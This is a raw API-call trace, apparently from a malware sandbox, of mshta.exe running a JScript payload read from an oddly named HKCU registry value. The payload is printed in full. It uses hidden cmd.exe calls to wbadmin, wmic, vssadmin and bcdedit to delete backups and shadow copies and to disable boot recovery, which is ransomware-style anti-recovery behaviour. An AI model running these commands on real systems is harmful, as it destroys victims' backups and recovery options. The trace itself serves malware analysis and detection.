[0072.995] StdGlobalInterfaceTable:IUnknown:AddRef (This=0x3bffa0) returned 0x2 [0072.995] IUnknown:AddRef (This=0x6368d8) returned 0x2 [0072.995] IUnknown:Release (This=0x6368d8) returned 0x1 [0072.995] ??2@YAPAXI@Z () returned 0x28c0998 [0072.995] GetTickCount () returned 0x1148ce5 [0072.995] ??2@YAPAXI@Z () returned 0x28c0fe8 [0072.995] malloc (_Size=0x40) returned 0x28c1058 [0072.995] malloc (_Size=0x104) returned 0x28c10a0 [0072.995] ??2@YAPAXI@Z () returned 0x3bffc8 [0072.995] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f3b8 | out: ppv=0x18f3b8*=0x6368d8) returned 0x0 [0072.995] IUnknown:Release (This=0x6368d8) returned 0x1 [0072.995] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f3b8 | out: ppv=0x18f3b8*=0x6368d8) returned 0x0 [0072.995] IUnknown:Release (This=0x6368d8) returned 0x1 [0072.996] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x10) returned 0x66df68 [0072.996] GetCurrentThreadId () returned 0x2a8 [0072.996] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x66df80 [0072.996] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20) returned 0x6707e0 [0072.996] GetCurrentThreadId () returned 0x2a8 [0072.996] realloc (_Block=0x0, _Size=0xc8) returned 0x28c11b0 [0072.996] ??2@YAPAXI@Z () returned 0x28c1280 [0072.997] malloc (_Size=0x804) returned 0x28c12a8 [0072.997] ??2@YAPAXI@Z () returned 0x28c1ab8 [0072.997] malloc (_Size=0x104) returned 0x28c1c20 [0072.997] malloc (_Size=0x204) returned 0x28c1d30 [0072.997] ??3@YAXPAX@Z () returned 0x1 [0072.997] malloc (_Size=0x40) returned 0x28c1f40 [0072.999] malloc (_Size=0x284) returned 0x28c1f88 [0073.000] ??2@YAPAXI@Z () returned 0x3b13d0 [0073.000] free (_Block=0x28c12a8) [0073.000] ??3@YAXPAX@Z () returned 0x1 [0073.000] free (_Block=0x28c1f40) [0073.000] free (_Block=0x28c1d30) [0073.000] free (_Block=0x28c1c20) [0073.000] ??2@YAPAXI@Z () returned 0x28c1280 [0073.000] ??2@YAPAXI@Z () returned 0x28c12b8 [0073.000] malloc (_Size=0xc) returned 0x28c12d8 [0073.000] ??2@YAPAXI@Z () returned 0x28c12f0 [0073.001] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f4d8 | out: ppv=0x18f4d8*=0x6368d8) returned 0x0 [0073.001] IUnknown:Release (This=0x6368d8) returned 0x1 [0073.001] ??2@YAPAXI@Z () returned 0x28c1338 [0073.001] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f528 | out: ppv=0x18f528*=0x6368d8) returned 0x0 [0073.001] IUnknown:Release (This=0x6368d8) returned 0x1 [0073.001] ??2@YAPAXI@Z () returned 0x28c13a8 [0073.002] ISystemDebugEventFire:IsActive (This=0x65e300) returned 0x1 [0073.002] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f524 | out: ppv=0x18f524*=0x6368d8) returned 0x0 [0073.002] IUnknown:Release (This=0x6368d8) returned 0x1 [0073.002] malloc (_Size=0x658) returned 0x28c1428 [0073.002] GetCurrentThreadId () returned 0x2a8 [0073.003] GetCurrentThreadId () returned 0x2a8 [0073.003] ??2@YAPAXI@Z () returned 0x28c1a88 [0073.004] ??2@YAPAXI@Z () returned 0x28c1af0 [0073.004] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76620000 [0073.005] GetProcAddress (hModule=0x76620000, lpProcName="CLSIDFromProgIDEx") returned 0x76630782 [0073.005] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x18f0ec | out: lpclsid=0x18f0ec*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0073.007] SysStringLen (param_1=0x0) returned 0x0 [0073.007] GetProcAddress (hModule=0x76620000, lpProcName="CoGetClassObject") returned 0x766554ad [0073.007] CoGetClassObject (in: rclsid=0x18f0ec*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f0e0 | out: ppv=0x18f0e0*=0x28c1b60) returned 0x0 [0074.221] malloc (_Size=0x80) returned 0x3bdcc0 [0074.221] GetVersionExA (in: lpVersionInformation=0x18dcc4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x77c6e026, dwPlatformId=0x76f9f761, szCSDVersion="|Ý\x18") | out: lpVersionInformation=0x18dcc4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0074.221] GetUserDefaultLCID () returned 0x409 [0074.221] DllGetClassObject (in: rclsid=0x640cd4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x18ed90*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18e448 | out: ppv=0x18e448*=0x28c1b60) returned 0x0 [0074.221] ??2@YAPAXI@Z () returned 0x28c1b60 [0074.221] WshShell:IUnknown:AddRef (This=0x28c1b60) returned 0x2 [0074.222] WshShell:IUnknown:Release (This=0x28c1b60) returned 0x1 [0074.222] WshShell:IUnknown:QueryInterface (in: This=0x28c1b60, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18f00c | out: ppvObject=0x18f00c*=0x28c1b60) returned 0x0 [0074.222] WshShell:IUnknown:Release (This=0x28c1b60) returned 0x1 [0074.222] ??2@YAPAXI@Z () returned 0x28c1b78 [0074.222] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ef68, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0074.222] lstrlenA (lpString="\\wscript.exe") returned 12 [0074.222] lstrlenA (lpString="C:\\Windows\\SysWOW64\\mshta.exe") returned 29 [0074.222] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\wscript.exe") returned -1 [0074.222] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\cscript.exe") returned -1 [0074.222] ??3@YAXPAX@Z () returned 0x1 [0074.223] LoadRegTypeLib (in: rguid=0x74a014bc*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x18f10c*=0x0 | out: pptlib=0x18f10c*=0x6720e0) returned 0x0 [0074.235] ITypeLib:GetTypeInfoOfGuid (in: This=0x6720e0, GUID=0x74a014cc, ppTInfo=0x18f0f0 | out: ppTInfo=0x18f0f0*=0x67387c) returned 0x0 [0074.236] ITypeInfo:GetRefTypeOfImplType (in: This=0x67387c, index=0xffffffff, pRefType=0x18f0e4 | out: pRefType=0x18f0e4*=0xfffffffe) returned 0x0 [0074.236] ITypeInfo:GetRefTypeInfo (in: This=0x67387c, hreftype=0xfffffffe, ppTInfo=0x74a1501c | out: ppTInfo=0x74a1501c*=0x6738a8) returned 0x0 [0074.236] IUnknown:Release (This=0x67387c) returned 0x1 [0074.236] IUnknown:Release (This=0x6720e0) returned 0x1 [0074.236] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.237] ITypeInfo:LocalGetIDsOfNames (This=0x6738a8) returned 0x0 [0074.237] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.237] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.237] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0074.237] ITypeInfo:LocalInvoke (This=0x6738a8) returned 0x0 [0074.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\[M[ZF\\HMEYE", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0074.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\[M[ZF\\HMEYE", cchWideChar=-1, lpMultiByteStr=0x18edd0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\[M[ZF\\HMEYE", lpUsedDefaultChar=0x0) returned 26 [0074.238] _mbsnbcmp (_Str1=0x18edd0, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0074.238] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\[M[ZF", ulOptions=0x0, samDesired=0x1, phkResult=0x18eda8 | out: phkResult=0x18eda8*=0x240) returned 0x0 [0074.238] RegQueryValueExA (in: hKey=0x240, lpValueName="HMEYE", lpReserved=0x0, lpType=0x18ee1c, lpData=0x0, lpcbData=0x18ee20*=0x398e78 | out: lpType=0x18ee1c*=0x1, lpData=0x0, lpcbData=0x18ee20*=0x164) returned 0x0 [0074.238] RegQueryValueExA (in: hKey=0x240, lpValueName="HMEYE", lpReserved=0x0, lpType=0x18ee1c, lpData=0x18ec60, lpcbData=0x18ee20*=0x164 | out: lpType=0x18ee1c*=0x1, lpData="o=new ActiveXObject(\"WScript.Shell\");o.Run(\"cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0\",0);o.Run(\"cmd.exe /c wmic SHADOWCOPY DELETE\",0);o.Run(\"cmd.exe /c vssadmin Delete Shadows /All /Quiet\",0);o.Run(\"cmd.exe /c bcdedit /set {default} recoveryenabled No\",0);o.Run(\"cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures\",0);", lpcbData=0x18ee20*=0x164) returned 0x0 [0074.238] RegCloseKey (hKey=0x240) returned 0x0 [0074.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ec60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 356 [0074.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18ec60, cbMultiByte=-1, lpWideCharStr=0x6743bc, cchWideChar=356 | out: lpWideCharStr="o=new ActiveXObject(\"WScript.Shell\");o.Run(\"cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0\",0);o.Run(\"cmd.exe /c wmic SHADOWCOPY DELETE\",0);o.Run(\"cmd.exe /c vssadmin Delete Shadows /All /Quiet\",0);o.Run(\"cmd.exe /c bcdedit /set {default} recoveryenabled No\",0);o.Run(\"cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures\",0);") returned 356 [0074.239] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.239] ??2@YAPAXI@Z () returned 0x28c1ba8 [0074.239] malloc (_Size=0x804) returned 0x28c2218 [0074.239] ??2@YAPAXI@Z () returned 0x28c1bd0 [0074.239] malloc (_Size=0x104) returned 0x28c1d38 [0074.240] malloc (_Size=0x204) returned 0x28c2a28 [0074.240] malloc (_Size=0x404) returned 0x28c2c38 [0074.240] ??3@YAXPAX@Z () returned 0x1 [0074.240] malloc (_Size=0x40) returned 0x28c1e48 [0074.240] malloc (_Size=0x6a8) returned 0x28c3048 [0074.241] ??2@YAPAXI@Z () returned 0x28c1b60 [0074.241] free (_Block=0x28c2218) [0074.241] ??3@YAXPAX@Z () returned 0x1 [0074.241] free (_Block=0x28c1e48) [0074.241] free (_Block=0x28c2c38) [0074.241] free (_Block=0x28c2a28) [0074.241] free (_Block=0x28c1d38) [0074.241] ??2@YAPAXI@Z () returned 0x28c1ba8 [0074.241] ??2@YAPAXI@Z () returned 0x28c1be0 [0074.242] GetCurrentThreadId () returned 0x2a8 [0074.243] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x24) returned 0x650a60 [0074.243] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.243] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.243] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30) returned 0x658908 [0074.243] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x30c) returned 0x674690 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bd00 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bd20 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bd40 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bd60 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bd80 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bda0 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bdc0 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66bde0 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66be00 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66be20 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66be40 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x66be60 [0074.244] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x10) returned 0x671b78 [0074.245] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.245] IsCharSpaceW (wch=0x6f) returned 0 [0074.245] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0074.245] IsCharSpaceW (wch=0x6f) returned 0 [0074.245] CLSIDFromProgIDEx (in: lpszProgID="WScript.Shell", lpclsid=0x18ec74 | out: lpclsid=0x18ec74*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0074.245] SysStringLen (param_1=0x0) returned 0x0 [0074.245] CoGetClassObject (in: rclsid=0x18ec74*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), dwClsContext=0x15, pvReserved=0x0, riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ec68 | out: ppv=0x18ec68*=0x28c1c60) returned 0x0 [0074.245] DllGetClassObject (in: rclsid=0x640cd4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x74a4087c*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ec68 | out: ppv=0x18ec68*=0x28c1c60) returned 0x0 [0074.245] ??2@YAPAXI@Z () returned 0x28c1c60 [0074.245] ??2@YAPAXI@Z () returned 0x28c1c78 [0074.245] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18eaf0, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\mshta.exe" (normalized: "c:\\windows\\syswow64\\mshta.exe")) returned 0x1d [0074.245] lstrlenA (lpString="\\wscript.exe") returned 12 [0074.245] lstrlenA (lpString="C:\\Windows\\SysWOW64\\mshta.exe") returned 29 [0074.246] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\wscript.exe") returned -1 [0074.246] _strcmpi (_Str1="64\\mshta.exe", _Str2="\\cscript.exe") returned -1 [0074.246] ??3@YAXPAX@Z () returned 0x1 [0074.246] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.246] ITypeInfo:LocalGetIDsOfNames (This=0x6738a8) returned 0x0 [0074.246] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.246] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.246] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0074.246] ITypeInfo:LocalInvoke (This=0x6738a8) returned 0x0 [0074.247] ExpandEnvironmentStringsW (in: lpSrc="cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0", lpDst=0x18e184, nSize=0x400 | out: lpDst="cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0") returned 0x3c [0074.247] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x759d0000 [0074.247] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0074.247] ShellExecuteExW (in: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0074.580] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.580] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.580] ITypeInfo:LocalGetIDsOfNames (This=0x6738a8) returned 0x0 [0074.580] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.580] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.580] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0074.581] ITypeInfo:LocalInvoke (This=0x6738a8) returned 0x0 [0074.581] ExpandEnvironmentStringsW (in: lpSrc="cmd.exe /c wmic SHADOWCOPY DELETE", lpDst=0x18e184, nSize=0x400 | out: lpDst="cmd.exe /c wmic SHADOWCOPY DELETE") returned 0x22 [0074.581] ShellExecuteExW (in: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c wmic SHADOWCOPY DELETE", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c wmic SHADOWCOPY DELETE", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0074.690] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.690] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.690] ITypeInfo:LocalGetIDsOfNames (This=0x6738a8) returned 0x0 [0074.690] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.690] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.690] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0074.690] ITypeInfo:LocalInvoke (This=0x6738a8) returned 0x0 [0074.690] ExpandEnvironmentStringsW (in: lpSrc="cmd.exe /c vssadmin Delete Shadows /All /Quiet", lpDst=0x18e184, nSize=0x400 | out: lpDst="cmd.exe /c vssadmin Delete Shadows /All /Quiet") returned 0x2f [0074.690] ShellExecuteExW (in: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c vssadmin Delete Shadows /All /Quiet", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c vssadmin Delete Shadows /All /Quiet", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0074.867] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.868] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.868] ITypeInfo:LocalGetIDsOfNames (This=0x6738a8) returned 0x0 [0074.868] IUnknown:Release (This=0x6738a8) returned 0x1 [0074.868] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0074.868] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0074.868] ITypeInfo:LocalInvoke (This=0x6738a8) returned 0x0 [0074.868] ExpandEnvironmentStringsW (in: lpSrc="cmd.exe /c bcdedit /set {default} recoveryenabled No", lpDst=0x18e184, nSize=0x400 | out: lpDst="cmd.exe /c bcdedit /set {default} recoveryenabled No") returned 0x35 [0074.868] ShellExecuteExW (in: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c bcdedit /set {default} recoveryenabled No", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c bcdedit /set {default} recoveryenabled No", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0075.009] IUnknown:Release (This=0x6738a8) returned 0x1 [0075.009] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0075.009] ITypeInfo:LocalGetIDsOfNames (This=0x6738a8) returned 0x0 [0075.009] IUnknown:Release (This=0x6738a8) returned 0x1 [0075.009] IUnknown:AddRef (This=0x6738a8) returned 0x2 [0075.009] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0075.009] ITypeInfo:LocalInvoke (This=0x6738a8) returned 0x0 [0075.009] ExpandEnvironmentStringsW (in: lpSrc="cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpDst=0x18e184, nSize=0x400 | out: lpDst="cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures") returned 0x45 [0075.010] ShellExecuteExW (in: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e950*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="cmd.exe", lpParameters="/c bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0075.403] IUnknown:Release (This=0x6738a8) returned 0x1 [0075.404] GetCurrentThreadId () returned 0x2a8 [0075.404] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0075.404] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0075.405] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x65eae0 [0075.405] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x128) returned 0x683270 [0075.405] malloc (_Size=0x204) returned 0x28c36f8 [0075.405] ??2@YAPAXI@Z () returned 0x28c1ec8 [0075.405] GetCurrentThreadId () returned 0x2a8 [0075.405] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0075.405] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x40) returned 0x65eb28 [0075.415] PostMessageW (hWnd=0x40162, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0075.415] GetCurrentThreadId () returned 0x2a8 [0075.415] GetCurrentThreadId () returned 0x2a8 [0075.415] ISystemDebugEventFire:IsActive (This=0x65e300) returned 0x1 [0075.432] ??3@YAXPAX@Z () returned 0x1 [0075.432] free (_Block=0x28c11b0) [0075.432] GetCurrentThreadId () returned 0x2a8 [0075.432] GetCurrentThreadId () returned 0x2a8 [0075.432] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.432] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0075.432] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x668e08 | out: hHeap=0x610000) returned 1 [0075.432] IBindStatusCallback:OnStopBinding (This=0x6505a0, hresult=0x80004004, szError=0x0) returned 0x0 [0075.432] IBinding:RemoteGetBindResult (in: This=0x6520a0, pclsidProtocol=0x18f670, pdwResult=0x18f660, pszResult=0x18f654, dwReserved=0x0 | out: pclsidProtocol=0x18f670*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), pdwResult=0x18f660*=0x80004004, pszResult=0x18f654*=0x0) returned 0x0 [0075.432] IUri:GetScheme (in: This=0x63c68c, pdwScheme=0x18f66c | out: pdwScheme=0x18f66c*=0xf) returned 0x0 [0075.432] IUnknown:QueryInterface (in: This=0x6520a0, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18f630 | out: ppvObject=0x18f630*=0x0) returned 0x80004002 [0075.432] IUnknown:QueryInterface (in: This=0x652ab8, riid=0x74c69460*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x18f61c | out: ppvObject=0x18f61c*=0x0) returned 0x80004002 [0075.432] GetCurrentThreadId () returned 0x2a8 [0075.432] IUnknown:Release (This=0x6520a0) returned 0x3 [0075.433] RevokeBindStatusCallback (pBC=0x64e618, pBSCb=0x6505a0) returned 0x0 [0075.433] IUnknown:Release 